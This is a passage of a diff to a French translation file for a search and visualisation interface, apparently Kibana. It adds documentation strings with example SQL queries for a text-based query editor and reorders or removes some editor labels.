\nWHERE NOT emp_no = 10000 LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.nullNotNull.markdown": "### IS NULL/IS NOT NULL\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no IS NOT NULL AND gender IS NULL\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.nullSafeEquality.markdown": "### Null safe equality:\n```\nSELECT 'elastic' <=> null AS \"equals\"\n\n égal\n---------------\nfaux\n```\n```\nSELECT null <=> null AS \"equals\"\n\n égal\n---------------\nvrai\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.orOperator.markdown": "### OR\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no < 10003 OR emp_no = 10005 ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.percentileFunction.markdown": "### PERCENTILE\nRetourne le centile n (représenté par le paramètre numeric_exp) des valeurs en entrée dans le champ field_name.\n\n```\nPERCENTILE(\n field_name, \n percentile[, \n method[, \n method_parameter]])\n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n- centile : expression numérique (doit être une constante et ne doit pas être basé sur un champ). Si la valeur est nulle, la fonction renvoie une valeur nulle.\n- method : chaîne littérale facultative pour l'algorithme de centile. Valeurs possibles : tdigest ou hdr. La valeur par défaut est tdigest.\n- method_parameter : numérique littéral facultatif qui configure l'algorithme de centile. Configure la compression pour tdigest ou number_of_significant_value_digits pour hdr. La valeur par défaut est la même que celle de l'algorithme de sauvegarde.\n\n```\nSELECT\n languages,\n PERCENTILE(salary, 97.3, 'tdigest', 100.0) AS \"97.3_TDigest\",\n PERCENTILE(salary, 97.3, 'hdr', 3) AS \"97.3_HDR\"\nFROM emp\nGROUP BY languages\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.percentileRankFunction.markdown": "### PERCENTILE_RANK\nRetourne le rang centile n (représenté par le paramètre numeric_exp) des valeurs en entrée dans le champ field_name.\n\n```\nPERCENTILE_RANK(\n field_name, \n value[, \n method[, \n method_parameter]]) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n- centile : expression numérique (doit être une constante et ne doit pas être basé sur un champ). Si la valeur est nulle, la fonction renvoie une valeur nulle.\n- method : chaîne littérale facultative pour l'algorithme de centile. Valeurs possibles : tdigest ou hdr. La valeur par défaut est tdigest.\n- method_parameter : numérique littéral facultatif qui configure l'algorithme de centile. Configure la compression pour tdigest ou number_of_significant_value_digits pour hdr. La valeur par défaut est la même que celle de l'algorithme de sauvegarde.\n\n```\nSELECT\n languages,\n ROUND(PERCENTILE_RANK(salary, 65000, 'tdigest', 100.0), 2) AS \"rank_TDigest\",\n ROUND(PERCENTILE_RANK(salary, 65000, 'hdr', 3), 2) AS \"rank_HDR\"\nFROM emp\nGROUP BY languages\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.skewnessFunction.markdown": "### SKEWNESS\nQuantifier la distribution asymétrique des valeurs en entrée dans le champ field_name.\n\n```\nSKEWNESS(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, SKEWNESS(salary) AS s FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.stsdevpopFunction.markdown": "### STDDEV_POP\nRetourne l'écart type de population des valeurs en entrée dans le champ field_name.\n\n```\nSTDDEV_POP(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, STDDEV_POP(salary) AS stddev FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.stsdevsampFunction.markdown": "### STDDEV_SAMP\nRetourne l'écart type de l'échantillon des valeurs en entrée dans le champ field_name.\n\n```\nSTDDEV_SAMP(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, STDDEV_SAMP(salary) AS stddev FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.subtractOperator.markdown": "### Subtract (infix -)\n```\nSELECT 1 - 1 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.sumFunction.markdown": "### SUM\nRetourne la somme des valeurs en entrée dans le champ field_name.\n\n```\nSUM(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT SUM(salary) AS sum FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.sumofsquaresFunction.markdown": "### SUM_OF_SQUARES\nRetourne la somme des carrés des valeurs en entrée dans le champ field_name.\n\n```\nSUM_OF_SQUARES(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, SUM_OF_SQUARES(salary) AS sumsq\n FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.varpopFunction.markdown": "### VAR_POP\nRetourne la variance de population des valeurs en entrée dans le champ field_name.\n\n```\nVAR_POP(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, VAR_POP(salary) AS varpop FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.varsampFunction.markdown": "### VAR_SAMP\nRetourne la variance de l'échantillon de valeurs en entrée dans le champ field_name.\n\n```\nVAR_SAMP(field_name) \n```\n- field_name : champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, VAR_SAMP(salary) AS varsamp FROM emp\n```\n ", "unifiedSearch.filter.applyFilterActionTitle": "Appliquer le filtre à la vue en cours", "unifiedSearch.filter.applyFilters.popupHeader": "Sélectionner les filtres à appliquer", "unifiedSearch.filter.applyFiltersPopup.cancelButtonLabel": "Annuler", @@ -5783,13 +5042,10 @@ "unifiedSearch.filter.filterBar.enableFilterButtonLabel": "Réactiver", "unifiedSearch.filter.filterBar.excludeFilterButtonLabel": "Exclure les résultats", "unifiedSearch.filter.filterBar.filterItemBadgeAriaLabel": "Actions de filtrage", - "unifiedSearch.filter.filterBar.filterItemBadgeIconAriaLabel": "Supprimer {filter}", "unifiedSearch.filter.filterBar.includeFilterButtonLabel": "Inclure les résultats", "unifiedSearch.filter.filterBar.indexPatternSelectPlaceholder": "Sélectionner une vue de données", "unifiedSearch.filter.filterBar.invalidDateFormatProvidedErrorMessage": "Format de date non valide fourni", - "unifiedSearch.filter.filterBar.labelErrorInfo": "Modèle d'indexation {indexPattern} introuvable", "unifiedSearch.filter.filterBar.labelErrorText": "Erreur", - "unifiedSearch.filter.filterBar.labelWarningInfo": "Le champ {fieldName} n'existe pas dans la vue en cours.", "unifiedSearch.filter.filterBar.labelWarningText": "Avertissement", "unifiedSearch.filter.filterBar.negatedFilterPrefix": "NON ", "unifiedSearch.filter.filterBar.pinFilterButtonLabel": "Épingler dans toutes les applications", @@ -5799,7 +5055,7 @@ "unifiedSearch.filter.filterEditor.addFilterPopupTitle": "Ajouter un filtre", "unifiedSearch.filter.filterEditor.cancelButtonLabel": "Annuler", "unifiedSearch.filter.filterEditor.createCustomLabelInputLabel": "Étiquette personnalisée", - "unifiedSearch.filter.filterEditor.createCustomLabelSwitchLabel": "Créer une étiquette personnalisée ?", + "unifiedSearch.filter.filterEditor.createCustomLabelSwitchLabel": "Créer une étiquette personnalisée ?", "unifiedSearch.filter.filterEditor.dateViewSelectLabel": "Vue de données", "unifiedSearch.filter.filterEditor.doesNotExistOperatorOptionLabel": "n'existe pas", "unifiedSearch.filter.filterEditor.editFilterPopupTitle": "Modifier le filtre", @@ -5845,44 +5101,94 @@ "unifiedSearch.filter.options.saveCurrentFilterSetLabel": "Enregistrer la requête enregistrée en cours", "unifiedSearch.filter.options.saveFilterSetLabel": "Enregistrer la requête enregistrée", "unifiedSearch.filter.options.unpinAllFiltersButtonLabel": "Tout désépingler", - "unifiedSearch.kueryAutocomplete.andOperatorDescription": "Nécessite que {bothArguments} soient ''vrai''.", "unifiedSearch.kueryAutocomplete.andOperatorDescription.bothArgumentsText": "les deux arguments", - "unifiedSearch.kueryAutocomplete.equalOperatorDescription": "{equals} une certaine valeur", - "unifiedSearch.kueryAutocomplete.equalOperatorDescription.equalsText": "égale", - "unifiedSearch.kueryAutocomplete.existOperatorDescription": "{exists} sous un certain format", + "unifiedSearch.kueryAutocomplete.equalOperatorDescription.equalsText": "égal", "unifiedSearch.kueryAutocomplete.existOperatorDescription.existsText": "existe", - "unifiedSearch.kueryAutocomplete.greaterThanOperatorDescription": "est {greaterThan} une certaine valeur", "unifiedSearch.kueryAutocomplete.greaterThanOperatorDescription.greaterThanText": "supérieur à", - "unifiedSearch.kueryAutocomplete.greaterThanOrEqualOperatorDescription": "est {greaterThanOrEqualTo} une certaine valeur", "unifiedSearch.kueryAutocomplete.greaterThanOrEqualOperatorDescription.greaterThanOrEqualToText": "supérieur ou égal à", - "unifiedSearch.kueryAutocomplete.lessThanOperatorDescription": "est {lessThan} une certaine valeur", "unifiedSearch.kueryAutocomplete.lessThanOperatorDescription.lessThanText": "inférieur à", - "unifiedSearch.kueryAutocomplete.lessThanOrEqualOperatorDescription": "est {lessThanOrEqualTo} une certaine valeur", "unifiedSearch.kueryAutocomplete.lessThanOrEqualOperatorDescription.lessThanOrEqualToText": "inférieur ou égal à", - "unifiedSearch.kueryAutocomplete.orOperatorDescription": "Nécessite qu’{oneOrMoreArguments} soit ''vrai''.", "unifiedSearch.kueryAutocomplete.orOperatorDescription.oneOrMoreArgumentsText": "au moins un argument", "unifiedSearch.noDataPopover.content": "Cette plage temporelle ne contient pas de données. Étendez ou ajustez la plage temporelle pour obtenir plus de champs et pouvoir créer des graphiques.", "unifiedSearch.noDataPopover.dismissAction": "Ne plus afficher", "unifiedSearch.noDataPopover.subtitle": "Conseil", "unifiedSearch.noDataPopover.title": "Ensemble de données vide", "unifiedSearch.query.queryBar.clearInputLabel": "Effacer l'entrée", - "unifiedSearch.query.queryBar.comboboxAriaLabel": "Rechercher et filtrer la page {pageType}", "unifiedSearch.query.queryBar.indexPattern.addFieldButton": "Ajouter un champ à cette vue de données", "unifiedSearch.query.queryBar.indexPattern.addNewDataView": "Créer une vue de données", + "unifiedSearch.query.queryBar.indexPattern.dataViewsLabel": "Vues de données", "unifiedSearch.query.queryBar.indexPattern.findDataView": "Rechercher une vue de données", "unifiedSearch.query.queryBar.indexPattern.findFilterSet": "Rechercher une requête enregistrée", "unifiedSearch.query.queryBar.indexPattern.manageFieldButton": "Gérer cette vue de données", + "unifiedSearch.query.queryBar.indexPattern.textBasedLangSwitchWarning": "Un changement de vue de données supprime la requête SQL en cours. Sauvegardez cette recherche pour ne pas perdre de travail.", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesLabel": "Langages de requête à base de texte", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalBody": "Un changement de vue de données supprime la requête SQL en cours. Sauvegardez cette recherche pour ne pas perdre de travail.", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalCloseButton": "Basculer sans sauvegarder", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalDismissButton": "Ne plus afficher cet avertissement", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalSaveButton": "Sauvegarder et basculer", + "unifiedSearch.query.queryBar.indexPattern.textBasedLanguagesTransitionModalTitle": "Votre requête sera supprimée", "unifiedSearch.query.queryBar.kqlLanguageName": "KQL", "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoDocLinkText": "documents", "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoOptOutText": "Ne plus afficher", - "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoText": "Il semblerait que votre requête porte sur un champ imbriqué. Selon le résultat visé, il existe plusieurs façons de construire une syntaxe KQL pour des requêtes imbriquées. Apprenez-en plus avec notre {link}.", - "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoTitle": "Syntaxe de requête imbriquée KQL", + "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoTitle": "Syntaxe de requête imbriquée KQL", "unifiedSearch.query.queryBar.luceneLanguageName": "Lucene", - "unifiedSearch.query.queryBar.searchInputAriaLabel": "Commencer à taper pour rechercher et filtrer la page {pageType}", - "unifiedSearch.query.queryBar.searchInputPlaceholder": "Filtrer vos données à l'aide de la syntaxe {language}", "unifiedSearch.query.queryBar.searchInputPlaceholderForText": "Filtrer vos données", "unifiedSearch.query.queryBar.syntaxOptionsTitle": "Options de syntaxe", + "unifiedSearch.query.textBasedLanguagesEditor.aggregateFunctions": "Fonctions agrégées", + "unifiedSearch.query.textBasedLanguagesEditor.aggregateFunctionsDocumentationDescription": "Fonctions permettant de calculer un résultat unique à partir d'un ensemble de valeurs d'entrée. Elasticsearch SQL ne prend en charge les fonctions agrégées que parallèlement au regroupement (implicite ou explicite).", + "unifiedSearch.query.textBasedLanguagesEditor.comparisonOperators": "Opérateurs de comparaison", + "unifiedSearch.query.textBasedLanguagesEditor.comparisonOperatorsDocumentationDescription": "Opérateur booléen pour une comparaison par rapport à une ou plusieurs expressions.", + "unifiedSearch.query.textBasedLanguagesEditor.disableWordWrapLabel": "Désactiver le renvoi à la ligne des mots", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.AddOperator": "Ajouter", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.AndOperator": "AND", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.averageFunction": "Moyenne", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.between": "Entre", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.comparison": "Comparaison", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countAllFunction": "Count (All)", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countDistinctFunction": "Count (Distinct)", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countFunction": "Décompte", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.divideOperator": "Divide", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.equality": "Equality", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.firstFunction": "First / First_value", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.inequality": "Inequality", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.inOperator": "IN", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.kurtosisFunction": "Kurtosis", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.lastFunction": "Last / Last_value", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.madFunction": "Mad", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.maxFunction": "Max.", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.minFunction": "Min.", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.moduloOperator": "Modulo or remainder", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.multiplyOperator": "Multiplier", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.negateOperator": "Negate", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.NotOperator": "NON", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.nullNotNull": "IS NULL et IS NOT NULL", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.nullSafeEquality": "Null safe equality (<=>)", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.OrOperator": "OR", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.percentileFunction": "Centile", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.percentileRankFunction": "Rang centile", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.searchPlaceholder": "Recherche", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.skewnessFunction": "Skewness", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.stsdevpopFunction": "STDDEV_POP", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.stsdevsampFunction": "STDDEV_SAMP", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.SubtractOperator": "Subtract", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.sumFunction": "Somme", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.sumofsquaresFunction": "Sum of squares", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.varpopFunction": "VAR_POP", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.varsampFunction": "VAR_SAMP", + "unifiedSearch.query.textBasedLanguagesEditor.documentationLabel": "Documentation", + "unifiedSearch.query.textBasedLanguagesEditor.EnableWordWrapLabel": "Activer le renvoi à la ligne des mots", + "unifiedSearch.query.textBasedLanguagesEditor.errorsTitle": "Erreurs", + "unifiedSearch.query.textBasedLanguagesEditor.expandTooltip": "Développer l’éditeur de requête", + "unifiedSearch.query.textBasedLanguagesEditor.howItWorks": "Fonctionnement", + "unifiedSearch.query.textBasedLanguagesEditor.logicalOperators": "Opérateurs logiques", + "unifiedSearch.query.textBasedLanguagesEditor.logicalOperatorsDocumentationDescription": "Opérateur booléen permettant d'évaluer une ou deux expressions.", + "unifiedSearch.query.textBasedLanguagesEditor.mathOperators": "Opérateurs mathématiques", + "unifiedSearch.query.textBasedLanguagesEditor.mathOperatorsDocumentationDescription": "Effectuer des opérations mathématiques affectant une ou deux valeurs. Le résultat est une valeur de type numérique.", + "unifiedSearch.query.textBasedLanguagesEditor.MinimizeEditor": "Réduire l'éditeur", + "unifiedSearch.query.textBasedLanguagesEditor.minimizeTooltip": "Réduire l’éditeur de requête", + "unifiedSearch.query.textBasedLanguagesEditor.runQuery": "Exécuter la requête", "unifiedSearch.queryBarTopRow.submitButton.refresh": "Actualiser la requête", + "unifiedSearch.queryBarTopRow.submitButton.run": "Exécuter la requête", "unifiedSearch.queryBarTopRow.submitButton.update": "Nécessite une mise à jour", "unifiedSearch.search.searchBar.savedQuery": "Requête enregistrée", "unifiedSearch.search.searchBar.savedQueryDescriptionText": "Enregistrez le texte et les filtres de la requête que vous souhaitez réutiliser.", @@ -5897,33 +5203,55 @@ "unifiedSearch.search.searchBar.savedQueryPopoverApplyFilterSetLabel": "Appliquer la requête enregistrée", "unifiedSearch.search.searchBar.savedQueryPopoverConfirmDeletionCancelButtonText": "Annuler", "unifiedSearch.search.searchBar.savedQueryPopoverConfirmDeletionConfirmButtonText": "Supprimer", - "unifiedSearch.search.searchBar.savedQueryPopoverConfirmDeletionTitle": "Supprimer \"{savedQueryName}\" ?", "unifiedSearch.search.searchBar.savedQueryPopoverReplaceFilterSetLabel": "Remplacer par la requête enregistrée sélectionnée", "unifiedSearch.search.searchBar.savedQueryPopoverSaveAsNewButtonAriaLabel": "Enregistrer en tant que nouvelle requête enregistrée", "unifiedSearch.search.searchBar.savedQueryPopoverSaveAsNewButtonText": "Enregistrer en tant que nouvelle", - "unifiedSearch.search.searchBar.savedQueryPopoverSaveChangesButtonAriaLabel": "Enregistrer les modifications apportées à {title}", "unifiedSearch.search.searchBar.savedQueryPopoverSaveChangesButtonText": "Enregistrer les modifications", - "unifiedSearch.search.unableToGetSavedQueryToastTitle": "Impossible de charger la requête enregistrée {savedQueryId}", "unifiedSearch.switchLanguage.buttonText": "Bouton de changement de langue.", - "utils.filename.pathWarning": "Le chemin est peut-être incorrectement formé ; vérifiez la valeur", - "utils.filename.wildcardWarning": "l'utilisation de caractères génériques dans les chemins de fichier peut affecter les performances du point de terminaison", - "visDefaultEditor.advancedToggle.advancedLinkLabel": "Avancé", + "unifiedSearch.triggers.updateFilterReferencesTrigger": "Mettre à jour les références de filtre", + "unifiedSearch.triggers.updateFilterReferencesTriggerDescription": "Mettre à jour les références de filtre", "visDefaultEditor.agg.disableAggButtonTooltip": "Désactiver l'agrégation {aggTitle} de {schemaTitle}", "visDefaultEditor.agg.enableAggButtonTooltip": "Activer l'agrégation {aggTitle} de {schemaTitle}", "visDefaultEditor.agg.errorsAriaLabel": "L'agrégation {aggTitle} de {schemaTitle} présente des erreurs.", "visDefaultEditor.agg.modifyPriorityButtonTooltip": "Modifier la priorité de l'agrégation {aggTitle} de {schemaTitle} en la faisant glisser", "visDefaultEditor.agg.removeDimensionButtonTooltip": "Supprimer l'agrégation {aggTitle} de {schemaTitle}", "visDefaultEditor.agg.toggleEditorButtonAriaLabel": "Activer/Désactiver l'éditeur {schema}", - "visDefaultEditor.aggAdd.addButtonLabel": "Ajouter", "visDefaultEditor.aggAdd.addGroupButtonLabel": "Ajouter {groupNameLabel}", "visDefaultEditor.aggAdd.addSubGroupButtonLabel": "Ajouter sous-{groupNameLabel}", - "visDefaultEditor.aggAdd.bucketLabel": "compartiment", "visDefaultEditor.aggAdd.maxBuckets": "Nombre maximal de {groupNameLabel} atteint", - "visDefaultEditor.aggAdd.metricLabel": "indicateur", "visDefaultEditor.aggParams.errors.aggWrongRunOrderErrorMessage": "Les agrégations \"{schema}\" doivent s'exécuter avant tous les autres compartiments.", - "visDefaultEditor.aggSelect.aggregationLabel": "Agrégation", "visDefaultEditor.aggSelect.helpLinkLabel": "Aide {aggTitle}", "visDefaultEditor.aggSelect.noCompatibleAggsDescription": "Le modèle d'indexation {indexPatternTitle} ne possède pas de champs regroupables.", + "visDefaultEditor.controls.dateRanges.removeRangeButtonAriaLabel": "Supprimer la plage allant de {from} à {to}", + "visDefaultEditor.controls.definiteMetricLabel": "Indicateur : {metric}", + "visDefaultEditor.controls.field.fieldIsNotExists": "Le champ \"{fieldParameter}\" associé à cet objet n'existe plus dans le modèle d'indexation. Veuillez utiliser un autre champ.", + "visDefaultEditor.controls.field.invalidFieldForAggregation": "Le champ enregistré \"{fieldParameter}\" du modèle d'indexation \"{indexPatternTitle}\" n'est pas valide pour une utilisation avec cette agrégation. Veuillez sélectionner un nouveau champ.", + "visDefaultEditor.controls.field.noCompatibleFieldsDescription": "Le modèle d'indexation {indexPatternTitle} ne contient aucun des types de champs compatibles suivants : {fieldTypes}.", + "visDefaultEditor.controls.filters.definiteFilterLabel": "Étiquette du filtre {index}", + "visDefaultEditor.controls.filters.filterLabel": "Filtre {index}", + "visDefaultEditor.controls.ipRanges.cidrMaskAriaLabel": "Masque CIDR : {mask}", + "visDefaultEditor.controls.ipRanges.ipRangeFromAriaLabel": "Début de la plage d’IP : {value}", + "visDefaultEditor.controls.ipRanges.ipRangeToAriaLabel": "Fin de la plage d’IP : {value}", + "visDefaultEditor.controls.ipRanges.removeCidrMaskButtonAriaLabel": "Supprimer la valeur du masque CIDR de {mask}", + "visDefaultEditor.controls.ipRanges.removeRangeAriaLabel": "Supprimer la plage allant de {from} à {to}", + "visDefaultEditor.controls.maxBars.maxBarsHelpText": "Les intervalles seront sélectionnés automatiquement en fonction des données disponibles. Le nombre maximal de barres ne peut jamais être supérieur à la valeur {histogramMaxBars} des paramètres avancés.", + "visDefaultEditor.controls.numberInterval.minimumIntervalTooltip": "L'intervalle sera scalé automatiquement si la valeur fournie crée plus de compartiments que ce qui est spécifié par la valeur {histogramMaxBars} dans les paramètres avancés.", + "visDefaultEditor.controls.numberList.addUnitButtonLabel": "Ajouter {unitName}", + "visDefaultEditor.controls.numberList.invalidRangeErrorMessage": "La valeur doit être comprise dans la plage allant de {min} à {max}.", + "visDefaultEditor.controls.numberList.removeUnitButtonAriaLabel": "Supprimer la valeur de rang de {value}", + "visDefaultEditor.controls.ranges.removeRangeButtonAriaLabel": "Supprimer la plage allant de {from} à {to}", + "visDefaultEditor.controls.timeInterval.scaledHelpText": "Actuellement scalé à {bucketDescription}", + "visDefaultEditor.editorConfig.dateHistogram.customInterval.helpText": "Doit être un multiple de l'intervalle de configuration : {interval}.", + "visDefaultEditor.editorConfig.histogram.interval.helpText": "Doit être un multiple de l'intervalle de configuration : {interval}.", + "visDefaultEditor.metrics.wrongLastBucketTypeErrorMessage": "La dernière agrégation de compartiments doit être \"Histogramme de date\" ou \"Histogramme\" lorsque vous utilisez l'agrégation d'indicateurs \"{type}\".", + "visDefaultEditor.options.rangeErrorMessage": "Les valeurs doivent être comprises entre {min} et {max}, inclus.", + "visDefaultEditor.sidebar.indexPatternAriaLabel": "Modèle d'indexation : {title}", + "visDefaultEditor.sidebar.savedSearch.titleAriaLabel": "Recherche enregistrée : {title}", + "visDefaultEditor.advancedToggle.advancedLinkLabel": "Avancé", + "visDefaultEditor.aggAdd.addButtonLabel": "Ajouter", + "visDefaultEditor.aggAdd.bucketLabel": "compartiment", + "visDefaultEditor.aggAdd.metricLabel": "indicateur", + "visDefaultEditor.aggSelect.aggregationLabel": "Agrégation", "visDefaultEditor.aggSelect.selectAggPlaceholder": "Choisir une agrégation", "visDefaultEditor.aggSelect.subAggregationLabel": "Sous-agrégation", "visDefaultEditor.buckets.mustHaveBucketErrorMessage": "Ajoutez un compartiment avec une agrégation Histogramme de date ou Histogramme.", @@ -5938,9 +5266,7 @@ "visDefaultEditor.controls.dateRanges.addRangeButtonLabel": "Ajouter une plage", "visDefaultEditor.controls.dateRanges.errorMessage": "Chaque plage doit avoir au moins une date valide.", "visDefaultEditor.controls.dateRanges.fromColumnLabel": "De", - "visDefaultEditor.controls.dateRanges.removeRangeButtonAriaLabel": "Supprimer la plage allant de {from} à {to}", - "visDefaultEditor.controls.dateRanges.toColumnLabel": "Au", - "visDefaultEditor.controls.definiteMetricLabel": "Indicateur : {metric}", + "visDefaultEditor.controls.dateRanges.toColumnLabel": "À", "visDefaultEditor.controls.dotSizeRatioHelpText": "Remplacez le rapport du rayon du plus petit point par le plus grand point.", "visDefaultEditor.controls.dotSizeRatioLabel": "Rapport de taille de point", "visDefaultEditor.controls.dropPartialBucketsLabel": "Abandonner les compartiments partiels", @@ -5950,55 +5276,40 @@ "visDefaultEditor.controls.extendedBounds.minLabel": "Min.", "visDefaultEditor.controls.extendedBoundsLabel": "Étendre les limites", "visDefaultEditor.controls.extendedBoundsTooltip": "Le minimum et le maximum ne filtrent pas de résultats, mais étendent plutôt les limites de l'ensemble de résultats.", - "visDefaultEditor.controls.field.fieldIsNotExists": "Le champ \"{fieldParameter}\" associé à cet objet n'existe plus dans le modèle d'indexation. Veuillez utiliser un autre champ.", "visDefaultEditor.controls.field.fieldLabel": "Champ", - "visDefaultEditor.controls.field.invalidFieldForAggregation": "Le champ enregistré \"{fieldParameter}\" du modèle d'indexation \"{indexPatternTitle}\" n'est pas valide pour une utilisation avec cette agrégation. Veuillez sélectionner un nouveau champ.", - "visDefaultEditor.controls.field.noCompatibleFieldsDescription": "Le modèle d'indexation {indexPatternTitle} ne contient aucun des types de champs compatibles suivants : {fieldTypes}.", "visDefaultEditor.controls.field.selectFieldPlaceholder": "Sélectionner un champ", "visDefaultEditor.controls.filters.addFilterButtonLabel": "Ajouter un filtre", - "visDefaultEditor.controls.filters.definiteFilterLabel": "Étiquette du filtre {index}", - "visDefaultEditor.controls.filters.filterLabel": "Filtre {index}", "visDefaultEditor.controls.filters.labelPlaceholder": "Étiquette", "visDefaultEditor.controls.filters.removeFilterButtonAriaLabel": "Supprimer ce filtre", "visDefaultEditor.controls.filters.toggleFilterButtonAriaLabel": "Activer/Désactiver l'étiquette du filtre", "visDefaultEditor.controls.includeExclude.addUnitButtonLabel": "Ajouter une valeur", "visDefaultEditor.controls.ipRanges.addRangeButtonLabel": "Ajouter une plage", - "visDefaultEditor.controls.ipRanges.cidrMaskAriaLabel": "Masque CIDR : {mask}", - "visDefaultEditor.controls.ipRanges.cidrMasksButtonLabel": "Masques CIDR", + "visDefaultEditor.controls.ipRanges.cidrMasksButtonLabel": "Masques CIDR", "visDefaultEditor.controls.ipRanges.fromToButtonLabel": "De/à", - "visDefaultEditor.controls.ipRanges.ipRangeFromAriaLabel": "Début de la plage d’IP : {value}", - "visDefaultEditor.controls.ipRanges.ipRangeToAriaLabel": "Fin de la plage d’IP : {value}", - "visDefaultEditor.controls.ipRanges.removeCidrMaskButtonAriaLabel": "Supprimer la valeur du masque CIDR de {mask}", - "visDefaultEditor.controls.ipRanges.removeEmptyCidrMaskButtonAriaLabel": "Supprimer la valeur par défaut du masque CIDR", - "visDefaultEditor.controls.ipRanges.removeRangeAriaLabel": "Supprimer la plage allant de {from} à {to}", + "visDefaultEditor.controls.ipRanges.removeEmptyCidrMaskButtonAriaLabel": "Supprimer la valeur par défaut du masque CIDR", "visDefaultEditor.controls.ipRangesAriaLabel": "Plages d’IP", - "visDefaultEditor.controls.jsonInputLabel": "Entrée JSON", - "visDefaultEditor.controls.jsonInputTooltip": "Toutes les propriétés au format JSON ajoutées ici seront fusionnées avec la définition d'agrégation Elasticsearch pour cette section. Par exemple, \"shard_size\" pour une agrégation de termes.", + "visDefaultEditor.controls.jsonInputLabel": "Entrée JSON", + "visDefaultEditor.controls.jsonInputTooltip": "Toutes les propriétés au format JSON ajoutées ici seront fusionnées avec la définition d'agrégation Elasticsearch pour cette section. Par exemple, \"shard_size\" pour une agrégation de termes.", "visDefaultEditor.controls.maxBars.autoPlaceholder": 